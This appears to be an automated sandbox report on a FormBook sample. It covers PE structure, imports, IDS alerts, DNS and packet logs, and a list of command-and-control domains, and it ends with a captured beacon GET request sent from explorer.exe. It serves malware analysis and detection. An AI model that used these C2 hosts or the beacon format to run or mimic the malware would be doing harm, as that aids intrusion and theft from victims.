.idata | 0x22a000 | 0x247a | 0x2600 | False | 0.3521792763157895 | data | 4.91843705755274 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x22d000 | 0x10 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x22e000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.186582516434666 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x22f000 | 0x6ec4 | 0x7000 | False | 0.6327427455357143 | data | 6.685586013840769 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x236000 | 0x1a400 | 0x1a400 | False | 0.1939267113095238 | data | 4.777981358404081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x236860 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_CURSOR | 0x236994 | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0x236ac8 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0x236bfc | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0x236d30 | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0x236e64 | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0x236f98 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_ICON | 0x2370cc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m | | | 0.6533687943262412
RT_ICON | 0x237534 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.36585365853658536
RT_ICON | 0x2385dc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.23973029045643154
RT_ICON | 0x23ab84 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m | | | 0.18304204062352386
RT_ICON | 0x23edac | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m | | | 0.16423290203327173
RT_ICON | 0x244234 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m | | | 0.12849484969518604
RT_STRING | 0x24d6dc | 0x1d4 | data | | | 0.4893162393162393
RT_STRING | 0x24d8b0 | 0x1d8 | data | | | 0.3983050847457627
RT_STRING | 0x24da88 | 0x198 | data | | | 0.4877450980392157
RT_STRING | 0x24dc20 | 0x174 | data | | | 0.5161290322580645
RT_STRING | 0x24dd94 | 0x278 | data | | | 0.46835443037974683
RT_STRING | 0x24e00c | 0xe8 | data | | | 0.5905172413793104
RT_STRING | 0x24e0f4 | 0x1d4 | data | | | 0.5042735042735043
RT_STRING | 0x24e2c8 | 0x450 | data | | | 0.3695652173913043
RT_STRING | 0x24e718 | 0x35c | data | | | 0.38953488372093026
RT_STRING | 0x24ea74 | 0x3e8 | data | | | 0.33
RT_STRING | 0x24ee5c | 0x234 | data | | | 0.475177304964539
RT_STRING | 0x24f090 | 0xec | data | | | 0.5508474576271186
RT_STRING | 0x24f17c | 0x1b4 | data | | | 0.5206422018348624
RT_STRING | 0x24f330 | 0x3e4 | data | | | 0.32028112449799195
RT_STRING | 0x24f714 | 0x358 | data | | | 0.4158878504672897
RT_STRING | 0x24fa6c | 0x2b4 | data | | | 0.4060693641618497
RT_RCDATA | 0x24fd20 | 0x10 | data | | | 1.5
RT_RCDATA | 0x24fd30 | 0x278 | data | | | 0.7389240506329114
RT_RCDATA | 0x24ffa8 | 0x219 | Delphi compiled form 'TForm1' | | | 0.6815642458100558
RT_GROUP_CURSOR | 0x2501c4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x2501d8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x2501ec | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x250200 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x250214 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x250228 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x25023c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_ICON | 0x250250 | 0x5a | data | | | 0.8
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, UpdateResourceA, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, IsBadStringPtrA, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetSystemDefaultLangID, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumResourceNamesA, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPolyFillMode, GetPixelFormat, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIconFromResourceEx, CreateIcon, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
ole32.dll | CoUninitialize, CoInitialize
oleaut32.dll | GetErrorInfo, SysFreeString
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll | ExtractIconA
nTDLL | ZwProtectVirtualMemory
ntdll | ZwWriteVirtualMemory
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/30/23-14:58:44.521868 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49750 | 80 | 192.168.2.6 | 3.33.130.190
11/30/23-14:59:05.034219 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.6 | 104.247.81.50
11/30/23-14:58:24.506470 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49749 | 80 | 192.168.2.6 | 104.140.89.24
11/30/23-14:59:45.996751 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 62.72.50.88
11/30/23-14:58:03.063025 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.6 | 34.93.103.39
11/30/23-14:59:25.599111 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.6 | 37.97.254.27
11/30/23-14:57:23.481544 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.6 | 3.33.130.190
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                  Nov 30, 2023 14:59:25.961117029 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961122036 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.961142063 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961163998 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961170912 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.961186886 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961216927 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:25.961227894 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:25.961265087 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.096074104 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141356945 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141415119 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141450882 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141457081 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141477108 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141501904 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141524076 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141545057 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141585112 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141621113 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141633987 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141658068 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141674042 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141694069 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141699076 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141730070 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141738892 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141766071 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141793966 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141805887 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141817093 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141844034 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141855955 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141879082 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141895056 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141915083 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141923904 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141951084 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141963959 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.141985893 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.141994953 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.142021894 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.142034054 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.142056942 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.142064095 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.142110109 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:26.276046038 CET804975237.97.254.27192.168.2.6
                                                                                                  Nov 30, 2023 14:59:26.276124001 CET4975280192.168.2.637.97.254.27
                                                                                                  Nov 30, 2023 14:59:45.842135906 CET4975380192.168.2.662.72.50.88
                                                                                                  Nov 30, 2023 14:59:45.996342897 CET804975362.72.50.88192.168.2.6
                                                                                                  Nov 30, 2023 14:59:45.996486902 CET4975380192.168.2.662.72.50.88
                                                                                                  Nov 30, 2023 14:59:45.996751070 CET4975380192.168.2.662.72.50.88
                                                                                                  Nov 30, 2023 14:59:46.150501966 CET804975362.72.50.88192.168.2.6
                                                                                                  Nov 30, 2023 14:59:46.150660992 CET804975362.72.50.88192.168.2.6
                                                                                                  Nov 30, 2023 14:59:46.150671005 CET804975362.72.50.88192.168.2.6
                                                                                                  Nov 30, 2023 14:59:46.150805950 CET4975380192.168.2.662.72.50.88
                                                                                                  Nov 30, 2023 14:59:46.150978088 CET4975380192.168.2.662.72.50.88
                                                                                                  Nov 30, 2023 14:59:46.304747105 CET804975362.72.50.88192.168.2.6
                                                                                                  Nov 30, 2023 15:00:08.723479986 CET4975480192.168.2.6156.237.159.158
                                                                                                  Nov 30, 2023 15:00:09.039400101 CET8049754156.237.159.158192.168.2.6
                                                                                                  Nov 30, 2023 15:00:09.039534092 CET4975480192.168.2.6156.237.159.158
                                                                                                  Nov 30, 2023 15:00:09.039658070 CET4975480192.168.2.6156.237.159.158
                                                                                                  Nov 30, 2023 15:00:09.355674982 CET8049754156.237.159.158192.168.2.6
                                                                                                  Nov 30, 2023 15:00:09.355779886 CET4975480192.168.2.6156.237.159.158
                                                                                                  Nov 30, 2023 15:00:09.355825901 CET4975480192.168.2.6156.237.159.158
                                                                                                  Nov 30, 2023 15:00:09.672169924 CET8049754156.237.159.158192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2023 14:56:13.914278984 CET | 53945 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 14:56:14.789621115 CET | 64196 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 14:56:41.161073923 CET | 56228 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 14:57:01.941209078 CET | 62899 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 14:57:02.152853012 CET | 53 | 62899 | 1.1.1.1 | 192.168.2.6
Nov 30, 2023 14:57:23.174552917 CET | 50375 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 14:57:23.381191969 CET | 53 | 50375 | 1.1.1.1 | 192.168.2.6
Nov 30, 2023 14:57:42.159241915 CET | 52438 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 14:57:42.291683912 CET | 53 | 52438 | 1.1.1.1 | 192.168.2.6
Nov 30, 2023 14:58:02.331818104 CET | 54491 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 14:58:02.716052055 CET | 53 | 54491 | 1.1.1.1 | 192.168.2.6
Nov 30, 2023 14:58:23.905452967 CET | 52372 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 14:58:24.370285988 CET | 53 | 52372 | 1.1.1.1 | 192.168.2.6
Nov 30, 2023 14:58:44.284368992 CET | 57643 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 14:58:44.421730995 CET | 53 | 57643 | 1.1.1.1 | 192.168.2.6
Nov 30, 2023 14:59:04.643887043 CET | 63716 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 14:59:04.782854080 CET | 53 | 63716 | 1.1.1.1 | 192.168.2.6
Nov 30, 2023 14:59:25.025506973 CET | 65299 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 14:59:25.415021896 CET | 53 | 65299 | 1.1.1.1 | 192.168.2.6
Nov 30, 2023 14:59:45.393870115 CET | 64320 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 14:59:45.840954065 CET | 53 | 64320 | 1.1.1.1 | 192.168.2.6
Nov 30, 2023 15:00:06.378057003 CET | 61142 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2023 15:00:06.987632990 CET | 53 | 61142 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 30, 2023 14:56:13.914278984 CET | 192.168.2.6 | 1.1.1.1 | 0xeb02 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:56:14.789621115 CET | 192.168.2.6 | 1.1.1.1 | 0x8975 | Standard query (0) | naopta.bn.files.1drv.com | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:56:41.161073923 CET | 192.168.2.6 | 1.1.1.1 | 0x6f7c | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:57:01.941209078 CET | 192.168.2.6 | 1.1.1.1 | 0x83a4 | Standard query (0) | www.sprockettrucking.com | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:57:23.174552917 CET | 192.168.2.6 | 1.1.1.1 | 0x82f4 | Standard query (0) | www.leathfortexas.com | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:57:42.159241915 CET | 192.168.2.6 | 1.1.1.1 | 0x3e50 | Standard query (0) | www.ouxodb001.cfd | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:58:02.331818104 CET | 192.168.2.6 | 1.1.1.1 | 0x1c48 | Standard query (0) | www.optimusvisionlb.com | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:58:23.905452967 CET | 192.168.2.6 | 1.1.1.1 | 0xb2f5 | Standard query (0) | www.maltsky.net | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:58:44.284368992 CET | 192.168.2.6 | 1.1.1.1 | 0xaac1 | Standard query (0) | www.thnkotb.com | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:59:04.643887043 CET | 192.168.2.6 | 1.1.1.1 | 0xfe36 | Standard query (0) | www.harmonicod.com | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:59:25.025506973 CET | 192.168.2.6 | 1.1.1.1 | 0xafb1 | Standard query (0) | www.kermisbedrijfkramer.online | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:59:45.393870115 CET | 192.168.2.6 | 1.1.1.1 | 0xb84e | Standard query (0) | www.stellarskyline.com | A (IP address) | IN (0x0001) | false
Nov 30, 2023 15:00:06.378057003 CET | 192.168.2.6 | 1.1.1.1 | 0x300e | Standard query (0) | www.hivaom.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 30, 2023 14:56:14.044619083 CET | 1.1.1.1 | 192.168.2.6 | 0xeb02 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2023 14:56:14.044619083 CET | 1.1.1.1 | 192.168.2.6 | 0xeb02 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2023 14:56:14.947844982 CET | 1.1.1.1 | 192.168.2.6 | 0x8975 | No error (0) | naopta.bn.files.1drv.com | bn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2023 14:56:14.947844982 CET | 1.1.1.1 | 192.168.2.6 | 0x8975 | No error (0) | bn-files.fe.1drv.com | odc-bn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2023 14:56:41.291358948 CET | 1.1.1.1 | 192.168.2.6 | 0x6f7c | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2023 14:56:41.291358948 CET | 1.1.1.1 | 192.168.2.6 | 0x6f7c | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2023 14:57:02.152853012 CET | 1.1.1.1 | 192.168.2.6 | 0x83a4 | Name error (3) | www.sprockettrucking.com | none | none | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:57:23.381191969 CET | 1.1.1.1 | 192.168.2.6 | 0x82f4 | No error (0) | www.leathfortexas.com | leathfortexas.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2023 14:57:23.381191969 CET | 1.1.1.1 | 192.168.2.6 | 0x82f4 | No error (0) | leathfortexas.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:57:23.381191969 CET | 1.1.1.1 | 192.168.2.6 | 0x82f4 | No error (0) | leathfortexas.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:57:42.291683912 CET | 1.1.1.1 | 192.168.2.6 | 0x3e50 | Name error (3) | www.ouxodb001.cfd | none | none | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:58:02.716052055 CET | 1.1.1.1 | 192.168.2.6 | 0x1c48 | No error (0) | www.optimusvisionlb.com | optimus-vision.odoo.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2023 14:58:02.716052055 CET | 1.1.1.1 | 192.168.2.6 | 0x1c48 | No error (0) | optimus-vision.odoo.com | | 34.93.103.39 | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:58:24.370285988 CET | 1.1.1.1 | 192.168.2.6 | 0xb2f5 | No error (0) | www.maltsky.net | | 104.140.89.24 | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:58:44.421730995 CET | 1.1.1.1 | 192.168.2.6 | 0xaac1 | No error (0) | www.thnkotb.com | thnkotb.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2023 14:58:44.421730995 CET | 1.1.1.1 | 192.168.2.6 | 0xaac1 | No error (0) | thnkotb.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:58:44.421730995 CET | 1.1.1.1 | 192.168.2.6 | 0xaac1 | No error (0) | thnkotb.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:59:04.782854080 CET | 1.1.1.1 | 192.168.2.6 | 0xfe36 | No error (0) | www.harmonicod.com | | 104.247.81.50 | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:59:25.415021896 CET | 1.1.1.1 | 192.168.2.6 | 0xafb1 | No error (0) | www.kermisbedrijfkramer.online | kermisbedrijfkramer.online | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2023 14:59:25.415021896 CET | 1.1.1.1 | 192.168.2.6 | 0xafb1 | No error (0) | kermisbedrijfkramer.online | | 37.97.254.27 | A (IP address) | IN (0x0001) | false
Nov 30, 2023 14:59:45.840954065 CET | 1.1.1.1 | 192.168.2.6 | 0xb84e | No error (0) | www.stellarskyline.com | stellarskyline.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2023 14:59:45.840954065 CET | 1.1.1.1 | 192.168.2.6 | 0xb84e | No error (0) | stellarskyline.com | | 62.72.50.88 | A (IP address) | IN (0x0001) | false
Nov 30, 2023 15:00:06.987632990 CET | 1.1.1.1 | 192.168.2.6 | 0x300e | No error (0) | www.hivaom.top | | 156.237.159.158 | A (IP address) | IN (0x0001) | false
• www.leathfortexas.com
• www.optimusvisionlb.com
• www.maltsky.net
• www.thnkotb.com
• www.harmonicod.com
• www.kermisbedrijfkramer.online
• www.stellarskyline.com
• www.hivaom.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49747 | 3.33.130.190 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2023 14:57:23.481544018 CET | 238 | OUT | GET /ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
Host: www.leathfortexas.com
Connection: close
